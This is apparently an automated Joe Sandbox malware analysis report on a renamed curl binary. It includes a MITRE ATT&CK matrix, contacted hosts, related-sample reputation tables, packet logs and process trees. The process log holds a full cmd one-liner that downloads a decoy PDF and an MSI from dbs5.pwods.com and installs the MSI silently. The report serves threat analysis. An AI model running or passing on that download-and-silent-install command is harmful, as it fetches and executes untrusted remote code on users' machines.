Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe	Code function: 3_2_0010699F socket,htonl,setsockopt,bind,getsockname,listen,socket,connect,ioctlsocket,accept,getsockname,getpeername,closesocket,closesocket,closesocket,closesocket,	3_2_0010699F
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe	Code function: 3_2_000FA8D8 calloc,calloc,___from_strstr_to_strchr,___from_strstr_to_strchr,inet_pton,strncpy,___from_strstr_to_strchr,strtoul,___from_strstr_to_strchr,strtoul,getsockname,WSAGetLastError,free,free,WSAGetLastError,htons,bind,WSAGetLastError,getsockname,WSAGetLastError,getsockname,WSAGetLastError,listen,WSAGetLastError,htons,free,free,	3_2_000FA8D8
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe	Code function: 3_2_000F8490 calloc,calloc,calloc,calloc,calloc,calloc,bind,WSAGetLastError,	3_2_000F8490
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe	Code function: 3_2_000DDEDF strncmp,strncmp,inet_pton,inet_pton,htons,htons,htons,bind,getsockname,WSAGetLastError,WSAGetLastError,	3_2_000DDEDF

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	12 Command and Scripting Interpreter	1 DLL Side-Loading	11 Process Injection	1 Masquerading	OS Credential Dumping	1 System Time Discovery	Remote Services	11 Archive Collected Data	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	Boot or Logon Initialization Scripts	1 DLL Side-Loading	11 Process Injection	LSASS Memory	11 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	2 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Deobfuscate/Decode Files or Information	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	2 Obfuscated Files or Information	NTDS	22 System Information Discovery	Distributed Component Object Model	Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe	0%	ReversingLabs

Name	IP	Active	Malicious	Antivirus Detection	Reputation
dbs5.pwods.com	8.209.119.17	true	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://dbs5.pwods.com/download/pdf	false		unknown
https://dbs5.pwods.com/download/agent	false		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
https://curl.se/docs/hsts.html	TNheBOJElq.exe, TNheBOJElq.exe, 00000003.00000000.2040331928.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000002.2071726644.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000000.2056241857.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe.0.dr	false	unknown
https://curl.se/docs/copyright.htmlD	TNheBOJElq.exe, 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000002.2071765607.0000000000130000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe.0.dr	false	unknown
https://curl.se/libcurl/c/curl_easy_setopt.html	TNheBOJElq.exe.0.dr	false	unknown
https://curl.se/P	TNheBOJElq.exe, 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000002.2071765607.0000000000130000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe.0.dr	false	unknown
https://curl.se/docs/http-cookies.html#	TNheBOJElq.exe	false	unknown
https://curl.se/docs/http-cookies.html	TNheBOJElq.exe, TNheBOJElq.exe, 00000003.00000000.2040331928.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000002.2071726644.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000000.2056241857.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe.0.dr	false	unknown
https://curl.se/docs/hsts.html#	TNheBOJElq.exe	false	unknown
https://curl.se/docs/sslcerts.html	TNheBOJElq.exe, TNheBOJElq.exe, 00000003.00000000.2040331928.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000002.2071726644.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000000.2056241857.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe.0.dr	false	unknown
https://curl.se/docs/sslcerts.htmlcurl	TNheBOJElq.exe	false	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
8.209.119.17	dbs5.pwods.com	Singapore		45102	CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC	false

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1528038
Start date and time:	2024-10-07 14:31:43 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 40s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowscmdlinecookbook.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	CLEAN
Classification:	clean8.win@11/3@1/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 99% Number of executed functions: 65 Number of non-executed functions: 239

Warnings

Exclude process from analysis (whitelisted): WMIADAP.exe, SIHClient.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC	xd.arm7.elf	Get hash	malicious	Mirai	Browse	47.253.41.41
	z1SupplyInvoiceCM60916_Doc.exe	Get hash	malicious	FormBook	Browse	8.217.17.192
	https://gtm.you1.cn/app/381210	Get hash	malicious	Unknown	Browse	47.57.186.72
	na.elf	Get hash	malicious	Mirai, Okiru	Browse	47.255.177.103
	na.elf	Get hash	malicious	Mirai	Browse	8.221.121.89
	http://ipfs.io/ipfs/bafybeidgkzr2gy7npe4yonk6p7s4chmwvgd2cp7bk7u6llfwiutgvt77tq	Get hash	malicious	HTMLPhisher	Browse	47.246.131.28
	na.elf	Get hash	malicious	Mirai	Browse	47.91.26.168
	https://us-usps-vpoktn.xyz/update/	Get hash	malicious	Unknown	Browse	47.252.21.175
	https://us-usps-zguvhm.xyz/update/	Get hash	malicious	Unknown	Browse	47.252.21.175
	https://swiftclaimairdropmeta.pages.dev/	Get hash	malicious	HTMLPhisher	Browse	47.253.61.56

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
74954a0c86284d0d6e1c4efefe92b521	main.bat.bin.bat	Get hash	malicious	Discord Rat	Browse	8.209.119.17
	S4dd5N5VuJ.lnk	Get hash	malicious	Unknown	Browse	8.209.119.17
	404.exe	Get hash	malicious	Unknown	Browse	8.209.119.17
	D0WmCTD2qO.bat	Get hash	malicious	Unknown	Browse	8.209.119.17
	c5WMpr1cOc.bat	Get hash	malicious	Unknown	Browse	8.209.119.17
	404.exe	Get hash	malicious	Unknown	Browse	8.209.119.17
	s14.bat	Get hash	malicious	Unknown	Browse	8.209.119.17
	s200.bat	Get hash	malicious	Unknown	Browse	8.209.119.17
	KYwOaWhyl6.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	8.209.119.17
	HdXeCzyZD9.exe	Get hash	malicious	LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT	Browse	8.209.119.17

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe	8SdvyePo6j.docm	Get hash	malicious	Unknown	Browse
	New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm	Get hash	malicious	Unknown	Browse
	https://rocksecuritymw.com/mus/?81367511	Get hash	malicious	DarkGate	Browse
	https://taskbes.com/ttse/?75486511	Get hash	malicious	DarkGate	Browse
	https://ledscreen.africa/dcil/?77391211	Get hash	malicious	DarkGate	Browse
	m7q7gcniEz.exe	Get hash	malicious	Unknown	Browse

Created / dropped Files

C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	470528
Entropy (8bit):	6.743680599799538
Encrypted:	false
SSDEEP:	12288:sUE03qxFqJC1cwgysc/2gIsJFBhlyAjoSYgq:sUE06qCSwgbW2gpD3sAkSYgq
MD5:	44E5BAEEE864F1E9EDBE3986246AB37A
SHA1:	6EDAE73E36B61B261369717EA3657A6783EBA872
SHA-256:	4BCA545DD0DEAC696838C6338BA66A934426A34CE43D136D2750436F31E6BAFB
SHA-512:	DC39C1E4F59FCAC4A0A6D6B0AD890F351B5D6655B3173950B8EB4A03419311D0020D86F4868A001DF5CE270DE570B86C4F8AB86473F65E678C5A3493949305EA
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: 8SdvyePo6j.docm, Detection: malicious, Browse Filename: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm, Detection: malicious, Browse Filename: , Detection: malicious, Browse Filename: , Detection: malicious, Browse Filename: , Detection: malicious, Browse Filename: m7q7gcniEz.exe, Detection: malicious, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m.z...)...)...).cP)...).y.(...).y.(...).y.(...).t>)...).n.(...)...)=..).y.(I..).yR)...).y.(...)Rich...)........................PE..L.....~b.................4..........p........P....@..........................p............@.................................\...4.......@.......................@Q..X...T...............................@............P...............................text...i3.......4.................. ..`.rdata..J....P.......8..............@..@.data...............................@....rsrc...@...........................@..@.reloc..@Q.......R..................@..B........................................................................................................................................................................................................................................................................................................

\Device\ConDrv

Download File

Process:	C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe
File Type:	ASCII text, with CR, LF line terminators
Category:	dropped
Size (bytes):	399
Entropy (8bit):	2.8468200845103793
Encrypted:	false
SSDEEP:	6:I2swj2SAykymUeg/8Uni1qSgOgcdSgOgcdivIdYn:Vz6ykymUexb1U9cL9cddYn
MD5:	468B8E2CE4B78F70D493C5E93268316B
SHA1:	C10BFB528603E153E49F323E0A7688639D84F717
SHA-256:	49AEA951831CC33FCD97502466B169294C78B8E327E418314523FDC574F06196
SHA-512:	83B6B721E7E1321F70C6778529CD6B6E41E7EF497D2EB7CE76AF7A7A7B60FA9C613BDFB6B55F67EE2D6683AB13DC4AD5CF6C3D1DBACB9B0ACEC0408D14A7EC3F
Malicious:	false
Reputation:	low
Preview:	% Total % Received % Xferd Average Speed Time Time Time Current.. Dload Upload Total Spent Left Speed... 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0. 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0. 0 0 0 0 0 0 0 0 --:--:-- 0:00:01 --:--:-- 0..

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 7, 2024 14:32:35.191113949 CEST	49706	443	192.168.2.5	8.209.119.17
Oct 7, 2024 14:32:35.191170931 CEST	443	49706	8.209.119.17	192.168.2.5
Oct 7, 2024 14:32:35.191277981 CEST	49706	443	192.168.2.5	8.209.119.17
Oct 7, 2024 14:32:35.222100019 CEST	49706	443	192.168.2.5	8.209.119.17
Oct 7, 2024 14:32:35.222145081 CEST	443	49706	8.209.119.17	192.168.2.5
Oct 7, 2024 14:32:35.831423044 CEST	443	49706	8.209.119.17	192.168.2.5
Oct 7, 2024 14:32:35.831743956 CEST	49706	443	192.168.2.5	8.209.119.17
Oct 7, 2024 14:32:35.835268021 CEST	49706	443	192.168.2.5	8.209.119.17
Oct 7, 2024 14:32:35.835299969 CEST	443	49706	8.209.119.17	192.168.2.5
Oct 7, 2024 14:32:35.835683107 CEST	443	49706	8.209.119.17	192.168.2.5
Oct 7, 2024 14:32:35.838810921 CEST	49706	443	192.168.2.5	8.209.119.17
Oct 7, 2024 14:32:35.879446030 CEST	443	49706	8.209.119.17	192.168.2.5
Oct 7, 2024 14:32:36.123728037 CEST	443	49706	8.209.119.17	192.168.2.5
Oct 7, 2024 14:32:36.123780966 CEST	443	49706	8.209.119.17	192.168.2.5
Oct 7, 2024 14:32:36.123842955 CEST	443	49706	8.209.119.17	192.168.2.5
Oct 7, 2024 14:32:36.123876095 CEST	49706	443	192.168.2.5	8.209.119.17
Oct 7, 2024 14:32:36.123910904 CEST	443	49706	8.209.119.17	192.168.2.5
Oct 7, 2024 14:32:36.123931885 CEST	49706	443	192.168.2.5	8.209.119.17
Oct 7, 2024 14:32:36.153832912 CEST	49706	443	192.168.2.5	8.209.119.17
Oct 7, 2024 14:32:36.153876066 CEST	443	49706	8.209.119.17	192.168.2.5
Oct 7, 2024 14:32:36.154272079 CEST	443	49706	8.209.119.17	192.168.2.5
Oct 7, 2024 14:32:36.154318094 CEST	443	49706	8.209.119.17	192.168.2.5
Oct 7, 2024 14:32:36.154376984 CEST	49706	443	192.168.2.5	8.209.119.17
Oct 7, 2024 14:32:36.165652990 CEST	49706	443	192.168.2.5	8.209.119.17
Oct 7, 2024 14:32:36.582453012 CEST	49709	443	192.168.2.5	8.209.119.17
Oct 7, 2024 14:32:36.582566977 CEST	443	49709	8.209.119.17	192.168.2.5
Oct 7, 2024 14:32:36.582679033 CEST	49709	443	192.168.2.5	8.209.119.17
Oct 7, 2024 14:32:36.703068018 CEST	49709	443	192.168.2.5	8.209.119.17
Oct 7, 2024 14:32:36.703147888 CEST	443	49709	8.209.119.17	192.168.2.5
Oct 7, 2024 14:32:37.300194979 CEST	443	49709	8.209.119.17	192.168.2.5
Oct 7, 2024 14:32:37.300327063 CEST	49709	443	192.168.2.5	8.209.119.17
Oct 7, 2024 14:32:37.342885017 CEST	49709	443	192.168.2.5	8.209.119.17
Oct 7, 2024 14:32:37.342972040 CEST	443	49709	8.209.119.17	192.168.2.5
Oct 7, 2024 14:32:37.343893051 CEST	443	49709	8.209.119.17	192.168.2.5
Oct 7, 2024 14:32:37.356769085 CEST	49709	443	192.168.2.5	8.209.119.17
Oct 7, 2024 14:32:37.399447918 CEST	443	49709	8.209.119.17	192.168.2.5
Oct 7, 2024 14:32:37.955348969 CEST	443	49709	8.209.119.17	192.168.2.5
Oct 7, 2024 14:32:37.955429077 CEST	443	49709	8.209.119.17	192.168.2.5
Oct 7, 2024 14:32:37.955518007 CEST	49709	443	192.168.2.5	8.209.119.17
Oct 7, 2024 14:32:37.976001978 CEST	49709	443	192.168.2.5	8.209.119.17
Oct 7, 2024 14:32:37.976046085 CEST	443	49709	8.209.119.17	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 7, 2024 14:32:35.008541107 CEST	61959	53	192.168.2.5	1.1.1.1
Oct 7, 2024 14:32:35.174392939 CEST	53	61959	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 7, 2024 14:32:35.008541107 CEST	192.168.2.5	1.1.1.1	0xa507	Standard query (0)	dbs5.pwods.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 7, 2024 14:32:35.174392939 CEST	1.1.1.1	192.168.2.5	0xa507	No error (0)	dbs5.pwods.com		8.209.119.17	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

dbs5.pwods.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49706	8.209.119.17	443	1532	C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-07 12:32:35 UTC	90	OUT	GET /download/pdf HTTP/1.1 Host: dbs5.pwods.com User-Agent: curl/7.83.1 Accept: /
2024-10-07 12:32:36 UTC	296	IN	HTTP/1.1 200 OK Content-Disposition: attachment; filename=govdoccc.pdf Content-Type: application/octet-stream Vary: Origin X-Ratelimit-Limit: 100 X-Ratelimit-Remaining: 100 X-Ratelimit-Reset: 1728304380 Date: Mon, 07 Oct 2024 12:32:36 GMT Connection: close Transfer-Encoding: chunked
2024-10-07 12:32:36 UTC	890	IN	Data Raw: 33 30 35 66 64 0d 0a 25 50 44 46 2d 32 2e 30 0a 25 e2 e3 cf d3 0a 39 20 30 20 6f 62 6a 0a 3c 3c 0a 2f 46 69 6c 74 65 72 20 2f 46 6c 61 74 65 44 65 63 6f 64 65 0a 2f 4c 65 6e 67 74 68 20 34 31 39 36 31 0a 2f 4c 65 6e 67 74 68 31 20 37 36 33 35 30 0a 3e 3e 0a 73 74 72 65 61 6d 0a 48 89 84 96 0b 78 4c d7 16 c7 ff 6b ce 9c 35 31 11 22 22 08 33 e7 cc 24 67 8a aa aa d7 25 37 d5 78 5e b7 97 4a 2f bd a8 5b 44 24 88 44 82 78 d6 bb a8 46 a4 f1 0a 82 48 3c e3 fd 16 82 a0 e2 15 af 78 b6 cc 98 c4 2b d4 28 ea fa f4 ea 44 a6 7b f0 b9 bd f7 7e fd 9c ef 5b 6b ef b5 ce 5a 7b 7f fb 77 f6 da fb 80 00 f8 61 32 24 44 76 ed f6 7e 93 ea 9f f5 8c 11 1e 87 90 7e d1 09 51 49 ce b9 eb a6 02 14 0e 54 2b 88 1e 95 ac 56 34 76 3e 06 02 7e 05 0c d7 62 93 06 26 1c 59 63 12 23 04 5f 02 f8 Data Ascii: 305fd%PDF-2.0%9 0 obj<</Filter /FlateDecode/Length 41961/Length1 76350>>streamHxLk51""3$g%7x^J/[D$DxFH<x+(D{~[kZ{wa2$Dv~~QIT+V4v>~b&Yc#_
2024-10-07 12:32:36 UTC	2372	IN	Data Raw: 5b 15 6b 7d eb bb d6 4e d6 28 6b 4c 88 2e c4 3f c4 a2 41 d3 69 95 35 7f 2d 50 ab a5 d5 d5 42 b5 86 5a 33 2d 5c 8b d7 26 6b d3 b4 99 5a aa 36 4f cb d1 36 6a db b5 7c 6d bf 56 a8 9d d6 ce 69 57 b5 32 5b b8 2d c2 d6 d6 d6 cf 16 6d 8b b5 0d b1 25 36 4c 68 38 ba 51 cd b5 96 b5 a9 6e 9d bb 85 3b dc dd da dd c6 dd de bd cd 7d d7 ed 29 ef ff e2 a3 17 4f 5e 94 57 84 54 94 7b ca bd bb 4d ec b3 6c 1d 74 16 dd e7 ba cd 52 a8 14 29 25 4b e3 a4 69 82 5d 9a b4 52 2a 96 7e d1 57 d1 47 ca c1 f2 1c b9 58 7e cc 60 5f c1 ce cc 16 8e e0 7e 86 48 13 04 bb 78 53 a1 a9 c2 0c f3 64 c1 2e db fc 44 81 52 4b 51 95 4e 4a e4 6b 76 7d 95 c9 ca 6e e5 98 72 45 b9 ae 3c 51 9e a9 50 03 04 bb 06 6a 13 b5 d5 1b 76 71 82 5d ba 9a ad ee 51 f7 ff 0f bb 2e 96 6e 96 de 82 5d fa 1b 76 d5 04 bb da Data Ascii: [k}N(kL.?Ai5-PBZ3-\&kZ6O6j\|mViW2[-m%6Lh8Qn;})O^WT{MltR)%Ki]R*~WGX~`_~HxSd.DRKQNJkv}nrE<QPjvq]Q.n]v
2024-10-07 12:32:36 UTC	538	IN	Data Raw: 2c c4 8e 78 3b de 89 77 45 b7 3b 63 17 ec 8a dd b1 27 f6 c5 12 1c 80 43 74 3a de 8f 0f e2 23 f8 38 3e 89 4f e1 b3 3a 17 c7 e0 0b f8 22 8e c3 09 91 25 bd 82 af e1 eb 38 19 a7 62 05 ce c0 59 91 31 cd c3 05 ba 00 17 e1 1b f8 26 2e c5 15 f8 1e 7e 88 1f e1 27 f8 29 7e 81 5f 47 cd b3 11 b7 e2 76 5d 84 3b 70 37 ee c7 4a 3c a6 5b e3 49 3c 85 67 f1 22 56 61 0d d6 45 45 64 23 af 8f 33 f1 26 c1 24 eb 53 26 c5 a4 46 7d 94 11 59 7e 96 69 66 72 4c 9e c9 37 85 a6 85 69 a5 db 9b 36 a6 9d b9 25 6a a7 3b a3 02 e8 6c ba 68 32 f7 9a ae a6 9b e9 6e 7a 98 9e a6 97 e9 6d fa 98 be a6 9f e9 6f 8a 4d 89 29 35 65 a6 dc 0c 30 03 cd 20 33 d8 0c 89 4e 86 ca 6a f9 e0 ff ef a3 43 2d da fd f6 3e 66 98 19 61 1e 32 8f 99 51 f2 2f a7 1c 3a 76 de c5 bb 24 97 e2 52 5d a6 cb 76 b9 ae b9 2b 70 Data Ascii: ,x;wE;c'Ct:#8>O:"%8bY1&.~')~_Gv];p7J<[I<g"VaEEd#3&$S&F}Y~ifrL7i6%j;lh2nzmoM)5e0 3NjC->fa2Q/:v$R]v+p
2024-10-07 12:32:36 UTC	4744	IN	Data Raw: 17 f9 16 be a5 6f e5 fb fb 62 5f e2 4b 7d 99 6f ed db f8 72 df db f7 f1 7d 7d 3f 33 da 3c 63 9e 83 75 f2 b1 7c 22 9f ca 67 f2 b9 fc 47 be 90 2f e5 2b 58 0f df c2 06 f8 0e 36 c2 26 d8 0c 5b 60 2b 6c 83 ed f0 3d ec 80 43 50 09 87 e1 08 1c 85 63 70 1c 4e c0 8f 70 32 a2 fd 8e 88 ee 52 2c c3 72 9d ae 33 74 a6 ce 8a 18 1f 89 0f e1 c3 11 f7 fd b0 3f 16 47 d4 0f c7 11 f8 40 34 09 bd b0 37 f6 89 d8 fd 06 d7 e2 ba 88 df 4d b8 19 b7 44 b3 f0 34 8e c6 67 fe c7 75 b5 40 45 71 5e e1 7b ff 7f 66 57 f1 85 cf 45 b0 30 30 bc 84 45 1e a2 22 a2 a0 bb 8b 28 be 40 51 d6 9a b8 20 2a a0 89 98 a4 36 1a 53 6d 8d 42 17 1b a3 c7 f8 38 c7 f8 a8 c7 62 cb 69 3a 98 6a d5 d8 86 78 62 5a 63 8c 31 3e a2 69 ea a3 d1 f8 48 b4 d6 a0 c7 1e 75 ff 7e bb a6 46 bb f7 cc 9e 3b 33 ff cc 7f ff 3b f7 Data Ascii: ob_K}or}}?3<cu\|"gG/+X6&[`+l=CPcpNp2R,r3t?G@47MD4gu@Eq^{fWE00E"(@Q *6SmB8bi:jxbZc1>iHu~F;3;

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49709	8.209.119.17	443	6484	C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-07 12:32:37 UTC	92	OUT	GET /download/agent HTTP/1.1 Host: dbs5.pwods.com User-Agent: curl/7.83.1 Accept: /
2024-10-07 12:32:37 UTC	190	IN	HTTP/1.1 200 OK Vary: Origin X-Ratelimit-Limit: 100 X-Ratelimit-Remaining: 99 X-Ratelimit-Reset: 1728304380 Date: Mon, 07 Oct 2024 12:32:37 GMT Content-Length: 0 Connection: close

Target ID:	0
Start time:	08:32:33
Start date:	07/10/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /C ""C:\Windows\System32\cmd.exe" /c cd /d "C:\Users\Gloza\AppData\Local\Temp\" & copy c:\windows\system32\curl.exe TNheBOJElq.exe & TNheBOJElq.exe -o "C:\Users\Gloza\Documents\QMQjaBdqIo.pdf" https://dbs5.pwods.com/download/pdf & "C:\Users\Gloza\Documents\QMQjaBdqIo.pdf" & TNheBOJElq.exe -o bLhLldebqq.msi https://dbs5.pwods.com/download/agent & C:\Windows\System32\msiexec.exe /i bLhLldebqq.msi /qn"
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	08:32:33
Start date:	07/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	08:32:33
Start date:	07/10/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c cd /d "C:\Users\Gloza\AppData\Local\Temp\"
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	08:32:33
Start date:	07/10/2024
Path:	C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe
Wow64 process (32bit):	true
Commandline:	TNheBOJElq.exe -o "C:\Users\Gloza\Documents\QMQjaBdqIo.pdf" https://dbs5.pwods.com/download/pdf
Imagebase:	0xc0000
File size:	470'528 bytes
MD5 hash:	44E5BAEEE864F1E9EDBE3986246AB37A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	08:32:35
Start date:	07/10/2024
Path:	C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe
Wow64 process (32bit):	true
Commandline:	TNheBOJElq.exe -o bLhLldebqq.msi https://dbs5.pwods.com/download/agent
Imagebase:	0xc0000
File size:	470'528 bytes
MD5 hash:	44E5BAEEE864F1E9EDBE3986246AB37A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	08:32:37
Start date:	07/10/2024
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\msiexec.exe /i bLhLldebqq.msi /qn
Imagebase:	0x7a0000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	08:32:37
Start date:	07/10/2024
Path:	C:\Windows\System32\msiexec.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\msiexec.exe /V
Imagebase:	0x7ff7f43f0000
File size:	69'632 bytes
MD5 hash:	E5DA170027542E25EDE42FC54C929077
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	7.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	5.4%
Total number of Nodes:	2000
Total number of Limit Nodes:	53

Executed Functions

Function 00103EA4 Relevance: 82.7, APIs: 34, Strings: 13, Instructions: 494
encryptionfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_strdup.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00103FA5

Part of subcall function 00103BB5: _mbschr.API-MS-WIN-CRT-MULTIBYTE-L1-1-0(?,0000005C), ref: 00103BC3
Part of subcall function 00103BB5: _mbsnbcmp.API-MS-WIN-CRT-MULTIBYTE-L1-1-0(?,CurrentUser,00000000), ref: 00103BE1
Part of subcall function 00103BB5: _mbschr.API-MS-WIN-CRT-MULTIBYTE-L1-1-0(?,0000005C), ref: 00103CC8

fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,00118DD4), ref: 00103FF1
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00104092
